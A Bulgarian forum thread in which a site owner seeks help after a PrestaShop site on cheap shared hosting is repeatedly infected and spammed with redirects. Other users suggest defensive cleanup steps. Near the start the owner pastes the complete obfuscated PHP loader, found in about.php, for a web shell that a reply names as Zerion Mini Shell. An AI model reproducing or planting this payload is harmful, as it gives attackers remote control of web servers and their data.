Проблем с едно хакерче ахахх

[EASYSURVIVOR]

Имам хостинг в намейчийп за 1 сайт.. имах и 1 блог ъордпресс , но го спрях.. така последните няколко дена 4-5 дена ме налази един хакер..
имаше го и преди 6-7 месеца и спря от само себе си и сега се върна пак ахаха

проблема е че този идва и удря index.php и htaccess и слага някакви страници about.php lock666.php

и нещо от сорта .. друго не пипа.. влизам възстановявам всичко, изтривам файловете.. пускам virus scan не открива нищо..
сменях пароли слагах 2 факторни идентификации.. и не става.. имам няколко сайта там и пипа един и същи сайт и точно по едно и също време сутрин 3.20 часа.. може би е някакъв кронджоб.. убих всички процеси, но сутринта същата история..

говорих с намечийп.. нищо не могат да направят.. едно и също пускаме дълбок скан за вируси и това.. и нищо не открива тази система..
сайта е екомерсе платформа.. не е ъордпресс да кажеш че има плъгини.. незнам откъде и по какъв начин идва

'ClamAV detected virus = [TO-27921.WEBSHELL.raw_php.MD5-a1701c37f5f09488e004292e46d97e90-30606.UNOFFICIAL]': /home/user/site.com/index.php

за 12 години никога не съм имал такива проблеми, като си купих евтин хостинг на намечийп и се започна това.. имам чуството че техния хостинг е заразен ахахах
чета по нета такива работи има много подобни случаи , но никой не може да реши проблема или главно не са описали как са решили ..
пробвах да заменя всички файлове с коре файловете , абе какво ли не пробвах и няма отърване..
сайт с 300 страници в момента са индексирани над 12 000 страници всичко се дублира.. инжектират някакъв редирект и незнам как толкова бързо индексират 5 000 страници примерно в гугъл.. аз 1 страница се мъча 10 дена аххаах

 

[s1yf0x]

..... незнам откъде и по какъв начин идва

няма и да разбереш, след като първото нещо, което правиш е да върнеш бекъпа и да изтриеш качените файлове......

 

[EASYSURVIVOR]

няма и да разбереш, след като първото нещо, което правиш е да върнеш бекъпа и да изтриеш качените файлове......

<?php function lzjqzG($OPjypj){$OPjypj=gzinflate(base64_decode($OPjypj));for($i=0;$i<strlen($OPjypj);$i++) {$OPjypj[$i] = chr(ord($OPjypj[$i])-1);}return $OPjypj;}$L7CRgr = "e0ec551b204b0d93bfa1d8dc2bcbbf8d";eval(lzjqzG("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"));?>

 

[EASYSURVIVOR]

Нещо не може да се декодира този код..

 

[hristonev]

Бейс64 е това в основата си. Рендва разни лайнца. Стартира за удобство на лошия Zerion Mini Shell некво тулченце дето наподобява файл експлорера в цпанелите и май админ в едно "подозирам, не съм го ползвал". От там на сетне е въпрос на въображение къде е изакал друга входна точка!

Нищо лошо за УП-а ама системата си е такава... Наскоро ми се наложи да пиша плъгини за УП. Аз съм в сорс контрол други колеги жасат през админ панела... тотал манджа, накрая моя код се качва за секунда, те във всяка среда ръчно нанасят промените! Бяха накачили разни отвратителни плъгини метабокс ли... не помня със сигурност. БД релации тип ако е пълнолуние и комшийката е в цикъл.

Та да се върнем на проблема, защо могат да запишат и стартират файл е въпрос на друга бира. По мое мнение има 2 начина да ти запишат нещо на сървъра. 1 имаш лабави права на файлове и директории. 2 имаш плъгин дето пита кораба майка за ъпдейти .
Успех с разрешаването. Аз лично съм ровил по такива акита (не помня да съм имал грандиозен успех). Когато лейката е с изгнило дъно, запушването на 2 дупки не спира теча.

 

[GORGO]

Направи крон да връща бекъп и си свиркай, такива като @s1yf0x дето не са отваряли терминал не ги случай

 

[Firefly]

По-скоро е бот, отколкото хакер. Имаш някъде дупка, така че колкото и да връщаш бекъпи, предполагам все от едно и също място намира достъп.

 

[EASYSURVIVOR]

Бейс64 е това в основата си. Рендва разни лайнца. Стартира за удобство на лошия Zerion Mini Shell некво тулченце дето наподобява файл експлорера в цпанелите и май админ в едно "подозирам, не съм го ползвал". От там на сетне е въпрос на въображение къде е изакал друга входна точка!

Нищо лошо за УП-а ама системата си е такава... Наскоро ми се наложи да пиша плъгини за УП. Аз съм в сорс контрол други колеги жасат през админ панела... тотал манджа, накрая моя код се качва за секунда, те във всяка среда ръчно нанасят промените! Бяха накачили разни отвратителни плъгини метабокс ли... не помня със сигурност. БД релации тип ако е пълнолуние и комшийката е в цикъл.

Та да се върнем на проблема, защо могат да запишат и стартират файл е въпрос на друга бира. По мое мнение има 2 начина да ти запишат нещо на сървъра. 1 имаш лабави права на файлове и директории. 2 имаш плъгин дето пита кораба майка за ъпдейти .
Успех с разрешаването. Аз лично съм ровил по такива акита (не помня да съм имал грандиозен успех). Когато лейката е с изгнило дъно, запушването на 2 дупки не спира теча.

не е уп обаче..

 

[s1yf0x]

Този код се е появил по някакъв начин. Не те интересува какво прави, а как се е появил.

 

[EASYSURVIVOR]

Този код се е появил по някакъв начин. Не те интересува какво прави, а как се е появил.

Помогни де, ако знаех нямаше да пусна темата.. нали първо не трябваше да трия файловете.. ами ето това е файла.. режат ми Index.php изчезва и се появава about.php с този код.. нищо друго необичайно няма.

P.S. намерих им още 1 файл дълбоко скрито някъде си сред файловете хахаа нека видим сега дали ще се задейства нещо отново..

 

[EASYSURVIVOR]

всички модулни папки са били с права 777.. трябва да са 755 майче.. промених ги уж.. скрипта е бил скрил от 1 година вътре.. незнам защо са задействали чак сега след 1 година хахахаха

 

[NovaPS]

А нещо нулнато ползваш ли?

 

[EASYSURVIVOR]

А нещо нулнато ползваш ли?

Не човек, няма.. ползвам един Престашоп магазин там.. всичко е дефаулт.. никакви теми , модули извън официалните..
на съшия хостинг имах 1 УП преди време и имаше нулнати добавки там.. сигурно от там е дошло.. и е чакало в зимен сън ахахах

 

[contra]

Плахо да вдигна ръка и да кажа пак: ако нищо друго не помогне, смяната на хоста обикновено дава резултат

Доскоро ми гърмяха редовно едни уордпреси в един цПанел хостинг и като изчерпах всичкото си ноухау по темата (то не е много), взех че ги преместих и се постабилизира дереджето...

ПП: и в миналото на няколко пъти съм се радвал на положителен резултат след прилагане на тоя "чалъм".

 

[Victor R]

access лог-а на сървъра какво показва точно преди да се появи тоя фаил?
В смисъл, виж точното време на създаването на тоя фаил, отвори лога и погледни последните ентрита преди тази секунда.

 

[hristonev]

Имам хостинг в намейчийп за 1 сайт.. имах и 1 блог ъордпресс

От тук явно съм се подвел. от УП-а може да са влезли и да са снесли в другия ти проект. Това че трябва да вдигнеш 1-2 папки нагоре не мисля, че е спирачка, особено на такъв хостинг.

папки са били с права 777

Моля, теглете билетче, но всички печелят

Не знам каква ти е системата, но ако подлежи на преглед. Свали я локално прегледай, след това трий и качвай прегладания проект.

 

[Blinky]

Направи крон да връща бекъп и си свиркай, такива като @s1yf0x дето не са отваряли терминал не ги случай

Това не е опция, опция е, но е да закърпиш гума с лепенка. Нали има едно време, в което ще седи, идеята е въобще да не се стигна до връщане на бекъп, както и до пробив.

Този код се е появил по някакъв начин. Не те интересува какво прави, а как се е появил.

Сега го интересува повече как да го махне и как да не направи така, че да го няма никога повече.

Изтрий си WP домейна и там всичко, според мен това е първото подозрително неща. Ако толкова ти трябва пък - махни нулнатите неща, сканирай (ако може свали и сканирай или на сървъра, ако има опция) и след това ъпдейтни всичко и виж дали ще го имаш проблема. Според мен това е. Представям си колко е надупчен WP щом са стигнали да ровят до Prest-ата.

 

[EASYSURVIVOR]

Това не е опция, опция е, но е да закърпиш гума с лепенка. Нали има едно време, в което ще седи, идеята е въобще да не се стигна до връщане на бекъп, както и до пробив.

Сега го интересува повече как да го махне и как да не направи така, че да го няма никога повече.

Изтрий си WP домейна и там всичко, според мен това е първото подозрително неща. Ако толкова ти трябва пък - махни нулнатите неща, сканирай (ако може свали и сканирай или на сървъра, ако има опция) и след това ъпдейтни всичко и виж дали ще го имаш проблема. Според мен това е. Представям си колко е надупчен WP щом са стигнали да ровят до Prest-ата.

ъордпресс отдавна е изтрин и няма файлове и домейни и файлове и всичко от до е изтрито.. файла който открих преди време в престашоп беше създаден с дата февруати 2022 , но не се е осъществило нищо до преди 5-6 дена.. явно сега са е задействало някакъв скрипт.. иначе е седяло там от повече от година.. все едно спяло зимен сън ахахах

 

[s1yf0x]

Това не е опция, опция е, но е да закърпиш гума с лепенка. Нали има едно време, в което ще седи, идеята е въобще да не се стигна до връщане на бекъп, както и до пробив.

Сега го интересува повече как да го махне и как да не направи така, че да го няма никога повече.

Изтрий си WP домейна и там всичко, според мен това е първото подозрително неща. Ако толкова ти трябва пък - махни нулнатите неща, сканирай (ако може свали и сканирай или на сървъра, ако има опция) и след това ъпдейтни всичко и виж дали ще го имаш проблема. Според мен това е. Представям си колко е надупчен WP щом са стигнали да ровят до Prest-ата.

Не трябва да го интересува как да го махне, а как се е появил. Това не става с изтриване на кода, декодирането му или връщане на бекъп. Писали сме го 100000 пъти:

1. спираш сайта през htaccess или location на nginx
2. гледаш датата на промяна на inode-а (не на файла) с най-простата команда stat
3. чете всички логове на сървъра, синтезира, анализира и запушва дупката
4. търси с grep, egrep в останалите файлове за "гъби", чисти и пуска сайта

 

[stuklen]

Триеш уордпреса и проблема ти е решен!